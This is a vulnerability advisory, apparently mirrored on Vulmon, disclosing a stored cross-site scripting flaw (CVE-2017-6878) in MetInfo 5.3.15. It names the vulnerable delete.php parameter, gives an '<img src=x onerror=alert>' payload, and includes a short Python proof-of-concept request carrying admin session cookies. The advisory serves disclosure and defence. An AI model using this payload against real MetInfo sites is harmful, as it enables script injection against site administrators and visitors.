Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

MetInfo 5.3.15 Cross Site Scripting

Related Vulnerabilities: CVE-2017-6878  
Publish Date: 18 Mar 2017
Author: Arice.chen
Source 
                							

                PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS
PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS
[CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting
Application: MetInfo
Versions Affected: 5.3.15
Vendor URL: http://www.metinfo.cn/
Software Link:http://www.metinfo.cn/upload/file/MetInfo5.3.zip
Bugs: Stored XSS
Author:Arice.chen(DBAPPSecurity Ltd)
Description:
MetInfo was established in March 2009, is a enterprise CMS, more than 40 m enterprises in the use of MeInfo build their own enterprise website.


Vulnerability detailsPSo
To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)>
Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed.
---------------------------------------------
E-mailPSocallarice@163.com
DBAppSecurity Ltd
www.dbappsecurity.com.cn


POC:
import requests
url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2,"
headers = {
     "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
 }
cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24",
  recordurl="",
  met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ",
  met_key="pnZh0Fw",
  langset="cn",
  upgraderemind="1",
  tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list"
  )
s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False)
if s.status_code==200:
  print 'Success'


Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background.
The problem find is delete.php?name_2=
payload is :<img src=x onerror=alert(2)>


If after the success of the insert JavaScript, to several places in the background and other users access to the front desk page to attack code execution


<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started